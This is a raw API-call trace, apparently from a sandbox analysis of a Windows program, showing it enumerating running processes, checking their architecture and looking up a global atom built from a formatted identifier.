	[0070.976] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.976] CloseHandle (hObject=0x224) returned 1
	[0070.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7288f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0070.976] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.976] CloseHandle (hObject=0x224) returned 1
	[0070.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0070.976] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.976] CloseHandle (hObject=0x224) returned 1
	[0070.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0070.976] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.976] CloseHandle (hObject=0x224) returned 1
	[0070.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e7c0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0070.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0070.977] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.977] CloseHandle (hObject=0x224) returned 1
	[0070.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0070.977] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.977] CloseHandle (hObject=0x224) returned 1
	[0070.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0070.977] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.977] CloseHandle (hObject=0x224) returned 1
	[0070.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0070.977] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.977] CloseHandle (hObject=0x224) returned 1
	[0070.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0070.977] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.977] CloseHandle (hObject=0x224) returned 1
	[0070.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0070.978] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.978] CloseHandle (hObject=0x224) returned 1
	[0070.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e7c0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0070.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0070.978] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.978] CloseHandle (hObject=0x224) returned 1
	[0070.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72eb08, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0070.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0070.978] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.978] CloseHandle (hObject=0x224) returned 1
	[0070.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.978] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.979] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0070.979] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.979] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.980] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetLastError () returned 0x5
	[0070.981] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.981] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0070.981] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.982] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0070.982] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0070.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0070.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0070.982] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.982] CloseHandle (hObject=0x224) returned 1
	[0070.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eb30, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0070.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0070.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0070.982] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.982] CloseHandle (hObject=0x224) returned 1
	[0070.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0071.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16ae8) returned 0xc0000004
	[0071.029] VirtualAlloc (lpAddress=0x0, dwSize=0x16be8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0071.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16be8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0071.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0071.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0071.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0071.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0071.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0071.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0071.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0071.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0071.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0071.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0071.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0071.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc90, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0071.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0071.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0071.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0071.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0071.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0071.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0071.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0071.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0071.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0071.033] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.033] CloseHandle (hObject=0x224) returned 1
	[0071.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0071.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0071.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728a38, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0071.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0071.038] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.038] CloseHandle (hObject=0x224) returned 1
	[0071.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728a58, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0071.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0071.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0071.038] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.038] CloseHandle (hObject=0x224) returned 1
	[0071.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0071.038] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.038] CloseHandle (hObject=0x224) returned 1
	[0071.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0071.038] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.038] CloseHandle (hObject=0x224) returned 1
